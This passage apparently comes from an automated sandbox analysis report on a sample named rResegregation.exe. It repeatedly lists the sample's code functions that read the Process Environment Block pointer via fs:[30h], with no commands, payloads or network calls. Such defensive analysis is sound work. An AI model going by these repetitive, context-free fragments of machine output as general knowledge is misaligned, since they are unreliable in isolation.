        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377EA5E7 mov ebx, dword ptr fs:[00000030h]2_2_377EA5E7
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377EA5E7 mov eax, dword ptr fs:[00000030h]2_2_377EA5E7
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377BB5E0 mov eax, dword ptr fs:[00000030h]2_2_377BB5E0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377BB5E0 mov eax, dword ptr fs:[00000030h]2_2_377BB5E0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377BB5E0 mov eax, dword ptr fs:[00000030h]2_2_377BB5E0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377BB5E0 mov eax, dword ptr fs:[00000030h]2_2_377BB5E0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377BB5E0 mov eax, dword ptr fs:[00000030h]2_2_377BB5E0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377BB5E0 mov eax, dword ptr fs:[00000030h]2_2_377BB5E0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3783C51D mov eax, dword ptr fs:[00000030h]2_2_3783C51D
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3785F51B mov eax, dword ptr fs:[00000030h]2_2_3785F51B
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3785F51B mov eax, dword ptr fs:[00000030h]2_2_3785F51B
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3785F51B mov eax, dword ptr fs:[00000030h]2_2_3785F51B
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3785F51B mov eax, dword ptr fs:[00000030h]2_2_3785F51B
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3785F51B mov eax, dword ptr fs:[00000030h]2_2_3785F51B
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3785F51B mov eax, dword ptr fs:[00000030h]2_2_3785F51B
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3785F51B mov ecx, dword ptr fs:[00000030h]2_2_3785F51B
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3785F51B mov ecx, dword ptr fs:[00000030h]2_2_3785F51B
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3785F51B mov eax, dword ptr fs:[00000030h]2_2_3785F51B
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3785F51B mov eax, dword ptr fs:[00000030h]2_2_3785F51B
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3785F51B mov eax, dword ptr fs:[00000030h]2_2_3785F51B
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3785F51B mov eax, dword ptr fs:[00000030h]2_2_3785F51B
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3785F51B mov eax, dword ptr fs:[00000030h]2_2_3785F51B
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377E65D0 mov eax, dword ptr fs:[00000030h]2_2_377E65D0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377EC5C6 mov eax, dword ptr fs:[00000030h]2_2_377EC5C6
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377AF5C7 mov eax, dword ptr fs:[00000030h]2_2_377AF5C7
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377AF5C7 mov eax, dword ptr fs:[00000030h]2_2_377AF5C7
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377AF5C7 mov eax, dword ptr fs:[00000030h]2_2_377AF5C7
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377AF5C7 mov eax, dword ptr fs:[00000030h]2_2_377AF5C7
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377AF5C7 mov eax, dword ptr fs:[00000030h]2_2_377AF5C7
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377AF5C7 mov eax, dword ptr fs:[00000030h]2_2_377AF5C7
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377AF5C7 mov eax, dword ptr fs:[00000030h]2_2_377AF5C7
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377AF5C7 mov eax, dword ptr fs:[00000030h]2_2_377AF5C7
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377AF5C7 mov eax, dword ptr fs:[00000030h]2_2_377AF5C7
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377B45B0 mov eax, dword ptr fs:[00000030h]2_2_377B45B0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377B45B0 mov eax, dword ptr fs:[00000030h]2_2_377B45B0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3787A553 mov eax, dword ptr fs:[00000030h]2_2_3787A553
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3788B55F mov eax, dword ptr fs:[00000030h]2_2_3788B55F
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3788B55F mov eax, dword ptr fs:[00000030h]2_2_3788B55F
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377E2594 mov eax, dword ptr fs:[00000030h]2_2_377E2594
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377EA580 mov eax, dword ptr fs:[00000030h]2_2_377EA580
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377EA580 mov eax, dword ptr fs:[00000030h]2_2_377EA580
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377E9580 mov eax, dword ptr fs:[00000030h]2_2_377E9580
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377E9580 mov eax, dword ptr fs:[00000030h]2_2_377E9580
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377B8470 mov eax, dword ptr fs:[00000030h]2_2_377B8470
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377B8470 mov eax, dword ptr fs:[00000030h]2_2_377B8470
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3783C490 mov eax, dword ptr fs:[00000030h]2_2_3783C490
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377DE45E mov eax, dword ptr fs:[00000030h]2_2_377DE45E
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377DE45E mov eax, dword ptr fs:[00000030h]2_2_377DE45E
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377DE45E mov eax, dword ptr fs:[00000030h]2_2_377DE45E
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377DE45E mov eax, dword ptr fs:[00000030h]2_2_377DE45E
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377DE45E mov eax, dword ptr fs:[00000030h]2_2_377DE45E
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3783D4A0 mov ecx, dword ptr fs:[00000030h]2_2_3783D4A0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3783D4A0 mov eax, dword ptr fs:[00000030h]2_2_3783D4A0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3783D4A0 mov eax, dword ptr fs:[00000030h]2_2_3783D4A0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377ED450 mov eax, dword ptr fs:[00000030h]2_2_377ED450
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377ED450 mov eax, dword ptr fs:[00000030h]2_2_377ED450
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377BD454 mov eax, dword ptr fs:[00000030h]2_2_377BD454
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377BD454 mov eax, dword ptr fs:[00000030h]2_2_377BD454
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377BD454 mov eax, dword ptr fs:[00000030h]2_2_377BD454
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377BD454 mov eax, dword ptr fs:[00000030h]2_2_377BD454
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377BD454 mov eax, dword ptr fs:[00000030h]2_2_377BD454
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377BD454 mov eax, dword ptr fs:[00000030h]2_2_377BD454
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377C0445 mov eax, dword ptr fs:[00000030h]2_2_377C0445
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377C0445 mov eax, dword ptr fs:[00000030h]2_2_377C0445
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377C0445 mov eax, dword ptr fs:[00000030h]2_2_377C0445
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377C0445 mov eax, dword ptr fs:[00000030h]2_2_377C0445
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377C0445 mov eax, dword ptr fs:[00000030h]2_2_377C0445
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377C0445 mov eax, dword ptr fs:[00000030h]2_2_377C0445
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377AB420 mov eax, dword ptr fs:[00000030h]2_2_377AB420
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377E7425 mov eax, dword ptr fs:[00000030h]2_2_377E7425
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377E7425 mov ecx, dword ptr fs:[00000030h]2_2_377E7425
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377A640D mov eax, dword ptr fs:[00000030h]2_2_377A640D
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3786F4FD mov eax, dword ptr fs:[00000030h]2_2_3786F4FD
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_37846400 mov eax, dword ptr fs:[00000030h]2_2_37846400
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_37846400 mov eax, dword ptr fs:[00000030h]2_2_37846400
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377D94FA mov eax, dword ptr fs:[00000030h]2_2_377D94FA
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377B64F0 mov eax, dword ptr fs:[00000030h]2_2_377B64F0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377EA4F0 mov eax, dword ptr fs:[00000030h]2_2_377EA4F0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377EA4F0 mov eax, dword ptr fs:[00000030h]2_2_377EA4F0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3786F409 mov eax, dword ptr fs:[00000030h]2_2_3786F409
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377EE4EF mov eax, dword ptr fs:[00000030h]2_2_377EE4EF
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377EE4EF mov eax, dword ptr fs:[00000030h]2_2_377EE4EF
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377E54E0 mov eax, dword ptr fs:[00000030h]2_2_377E54E0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_37839429 mov eax, dword ptr fs:[00000030h]2_2_37839429
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3783F42F mov eax, dword ptr fs:[00000030h]2_2_3783F42F
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3783F42F mov eax, dword ptr fs:[00000030h]2_2_3783F42F
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3783F42F mov eax, dword ptr fs:[00000030h]2_2_3783F42F
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3783F42F mov eax, dword ptr fs:[00000030h]2_2_3783F42F
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3783F42F mov eax, dword ptr fs:[00000030h]2_2_3783F42F
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377D44D1 mov eax, dword ptr fs:[00000030h]2_2_377D44D1
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377D44D1 mov eax, dword ptr fs:[00000030h]2_2_377D44D1
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377DF4D0 mov eax, dword ptr fs:[00000030h]2_2_377DF4D0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377DF4D0 mov eax, dword ptr fs:[00000030h]2_2_377DF4D0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377DF4D0 mov eax, dword ptr fs:[00000030h]2_2_377DF4D0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377DF4D0 mov eax, dword ptr fs:[00000030h]2_2_377DF4D0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377DF4D0 mov eax, dword ptr fs:[00000030h]2_2_377DF4D0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377DF4D0 mov eax, dword ptr fs:[00000030h]2_2_377DF4D0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377DF4D0 mov eax, dword ptr fs:[00000030h]2_2_377DF4D0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377DF4D0 mov eax, dword ptr fs:[00000030h]2_2_377DF4D0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377DF4D0 mov eax, dword ptr fs:[00000030h]2_2_377DF4D0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377D14C9 mov eax, dword ptr fs:[00000030h]2_2_377D14C9
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377D14C9 mov eax, dword ptr fs:[00000030h]2_2_377D14C9
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377D14C9 mov eax, dword ptr fs:[00000030h]2_2_377D14C9
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377D14C9 mov eax, dword ptr fs:[00000030h]2_2_377D14C9
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377D14C9 mov eax, dword ptr fs:[00000030h]2_2_377D14C9
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377EE4BC mov eax, dword ptr fs:[00000030h]2_2_377EE4BC
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377E44A8 mov eax, dword ptr fs:[00000030h]2_2_377E44A8
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377B24A2 mov eax, dword ptr fs:[00000030h]2_2_377B24A2
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377B24A2 mov ecx, dword ptr fs:[00000030h]2_2_377B24A2
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3787A464 mov eax, dword ptr fs:[00000030h]2_2_3787A464
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377EB490 mov eax, dword ptr fs:[00000030h]2_2_377EB490
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377EB490 mov eax, dword ptr fs:[00000030h]2_2_377EB490
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377E648A mov eax, dword ptr fs:[00000030h]2_2_377E648A
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377E648A mov eax, dword ptr fs:[00000030h]2_2_377E648A
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377E648A mov eax, dword ptr fs:[00000030h]2_2_377E648A
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3786F478 mov eax, dword ptr fs:[00000030h]2_2_3786F478
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377B0485 mov ecx, dword ptr fs:[00000030h]2_2_377B0485
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377D237A mov eax, dword ptr fs:[00000030h]2_2_377D237A
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3786F38A mov eax, dword ptr fs:[00000030h]2_2_3786F38A
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377BB360 mov eax, dword ptr fs:[00000030h]2_2_377BB360
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377BB360 mov eax, dword ptr fs:[00000030h]2_2_377BB360
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377BB360 mov eax, dword ptr fs:[00000030h]2_2_377BB360
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377BB360 mov eax, dword ptr fs:[00000030h]2_2_377BB360
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377BB360 mov eax, dword ptr fs:[00000030h]2_2_377BB360
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377BB360 mov eax, dword ptr fs:[00000030h]2_2_377BB360
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377EA350 mov eax, dword ptr fs:[00000030h]2_2_377EA350
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3782C3B0 mov eax, dword ptr fs:[00000030h]2_2_3782C3B0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377A8347 mov eax, dword ptr fs:[00000030h]2_2_377A8347
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377A8347 mov eax, dword ptr fs:[00000030h]2_2_377A8347
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377A8347 mov eax, dword ptr fs:[00000030h]2_2_377A8347
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377D332D mov eax, dword ptr fs:[00000030h]2_2_377D332D
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377AE328 mov eax, dword ptr fs:[00000030h]2_2_377AE328
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377AE328 mov eax, dword ptr fs:[00000030h]2_2_377AE328
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377AE328 mov eax, dword ptr fs:[00000030h]2_2_377AE328
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_378343D5 mov eax, dword ptr fs:[00000030h]2_2_378343D5
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377E8322 mov eax, dword ptr fs:[00000030h]2_2_377E8322
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377E8322 mov eax, dword ptr fs:[00000030h]2_2_377E8322
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377E8322 mov eax, dword ptr fs:[00000030h]2_2_377E8322
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377E631F mov eax, dword ptr fs:[00000030h]2_2_377E631F
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377CE310 mov eax, dword ptr fs:[00000030h]2_2_377CE310
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377CE310 mov eax, dword ptr fs:[00000030h]2_2_377CE310
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377CE310 mov eax, dword ptr fs:[00000030h]2_2_377CE310
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377A9303 mov eax, dword ptr fs:[00000030h]2_2_377A9303
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377A9303 mov eax, dword ptr fs:[00000030h]2_2_377A9303
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3786F30A mov eax, dword ptr fs:[00000030h]2_2_3786F30A
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3783330C mov eax, dword ptr fs:[00000030h]2_2_3783330C
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3783330C mov eax, dword ptr fs:[00000030h]2_2_3783330C
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3783330C mov eax, dword ptr fs:[00000030h]2_2_3783330C
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3783330C mov eax, dword ptr fs:[00000030h]2_2_3783330C
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377E33D0 mov eax, dword ptr fs:[00000030h]2_2_377E33D0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377E43D0 mov ecx, dword ptr fs:[00000030h]2_2_377E43D0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377B63CB mov eax, dword ptr fs:[00000030h]2_2_377B63CB
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377AE3C0 mov eax, dword ptr fs:[00000030h]2_2_377AE3C0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377AE3C0 mov eax, dword ptr fs:[00000030h]2_2_377AE3C0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377AE3C0 mov eax, dword ptr fs:[00000030h]2_2_377AE3C0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377AC3C7 mov eax, dword ptr fs:[00000030h]2_2_377AC3C7
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_37883336 mov eax, dword ptr fs:[00000030h]2_2_37883336
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377B93A6 mov eax, dword ptr fs:[00000030h]2_2_377B93A6
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377B93A6 mov eax, dword ptr fs:[00000030h]2_2_377B93A6
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377DA390 mov eax, dword ptr fs:[00000030h]2_2_377DA390
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377DA390 mov eax, dword ptr fs:[00000030h]2_2_377DA390
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377DA390 mov eax, dword ptr fs:[00000030h]2_2_377DA390
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3782E372 mov eax, dword ptr fs:[00000030h]2_2_3782E372
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3782E372 mov eax, dword ptr fs:[00000030h]2_2_3782E372
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3782E372 mov eax, dword ptr fs:[00000030h]2_2_3782E372
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3782E372 mov eax, dword ptr fs:[00000030h]2_2_3782E372
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_37830371 mov eax, dword ptr fs:[00000030h]2_2_37830371
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_37830371 mov eax, dword ptr fs:[00000030h]2_2_37830371
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377B1380 mov eax, dword ptr fs:[00000030h]2_2_377B1380
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377B1380 mov eax, dword ptr fs:[00000030h]2_2_377B1380
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377B1380 mov eax, dword ptr fs:[00000030h]2_2_377B1380
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377B1380 mov eax, dword ptr fs:[00000030h]2_2_377B1380
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377B1380 mov eax, dword ptr fs:[00000030h]2_2_377B1380
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377CF380 mov eax, dword ptr fs:[00000030h]2_2_377CF380
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377CF380 mov eax, dword ptr fs:[00000030h]2_2_377CF380
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377CF380 mov eax, dword ptr fs:[00000030h]2_2_377CF380
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377CF380 mov eax, dword ptr fs:[00000030h]2_2_377CF380
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377CF380 mov eax, dword ptr fs:[00000030h]2_2_377CF380
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377CF380 mov eax, dword ptr fs:[00000030h]2_2_377CF380
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377AB273 mov eax, dword ptr fs:[00000030h]2_2_377AB273
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377AB273 mov eax, dword ptr fs:[00000030h]2_2_377AB273
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377AB273 mov eax, dword ptr fs:[00000030h]2_2_377AB273
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3782E289 mov eax, dword ptr fs:[00000030h]2_2_3782E289
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3786F2AE mov eax, dword ptr fs:[00000030h]2_2_3786F2AE
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_378792AB mov eax, dword ptr fs:[00000030h]2_2_378792AB
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3788B2BC mov eax, dword ptr fs:[00000030h]2_2_3788B2BC
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3788B2BC mov eax, dword ptr fs:[00000030h]2_2_3788B2BC
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3788B2BC mov eax, dword ptr fs:[00000030h]2_2_3788B2BC
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3788B2BC mov eax, dword ptr fs:[00000030h]2_2_3788B2BC
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377DF24A mov eax, dword ptr fs:[00000030h]2_2_377DF24A
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_378832C9 mov eax, dword ptr fs:[00000030h]2_2_378832C9
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377D0230 mov ecx, dword ptr fs:[00000030h]2_2_377D0230
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377EA22B mov eax, dword ptr fs:[00000030h]2_2_377EA22B
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377EA22B mov eax, dword ptr fs:[00000030h]2_2_377EA22B
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377EA22B mov eax, dword ptr fs:[00000030h]2_2_377EA22B
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377A821B mov eax, dword ptr fs:[00000030h]2_2_377A821B
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377AA200 mov eax, dword ptr fs:[00000030h]2_2_377AA200
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377C02F9 mov eax, dword ptr fs:[00000030h]2_2_377C02F9
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377C02F9 mov eax, dword ptr fs:[00000030h]2_2_377C02F9
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377C02F9 mov eax, dword ptr fs:[00000030h]2_2_377C02F9
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377C02F9 mov eax, dword ptr fs:[00000030h]2_2_377C02F9
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377C02F9 mov eax, dword ptr fs:[00000030h]2_2_377C02F9
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377C02F9 mov eax, dword ptr fs:[00000030h]2_2_377C02F9
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377C02F9 mov eax, dword ptr fs:[00000030h]2_2_377C02F9
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377C02F9 mov eax, dword ptr fs:[00000030h]2_2_377C02F9
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377AD2EC mov eax, dword ptr fs:[00000030h]2_2_377AD2EC
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377AD2EC mov eax, dword ptr fs:[00000030h]2_2_377AD2EC
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3783B214 mov eax, dword ptr fs:[00000030h]2_2_3783B214
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3783B214 mov eax, dword ptr fs:[00000030h]2_2_3783B214
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377A72E0 mov eax, dword ptr fs:[00000030h]2_2_377A72E0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377BA2E0 mov eax, dword ptr fs:[00000030h]2_2_377BA2E0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377BA2E0 mov eax, dword ptr fs:[00000030h]2_2_377BA2E0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377BA2E0 mov eax, dword ptr fs:[00000030h]2_2_377BA2E0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377BA2E0 mov eax, dword ptr fs:[00000030h]2_2_377BA2E0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377BA2E0 mov eax, dword ptr fs:[00000030h]2_2_377BA2E0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377BA2E0 mov eax, dword ptr fs:[00000030h]2_2_377BA2E0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377B82E0 mov eax, dword ptr fs:[00000030h]2_2_377B82E0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377B82E0 mov eax, dword ptr fs:[00000030h]2_2_377B82E0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377B82E0 mov eax, dword ptr fs:[00000030h]2_2_377B82E0
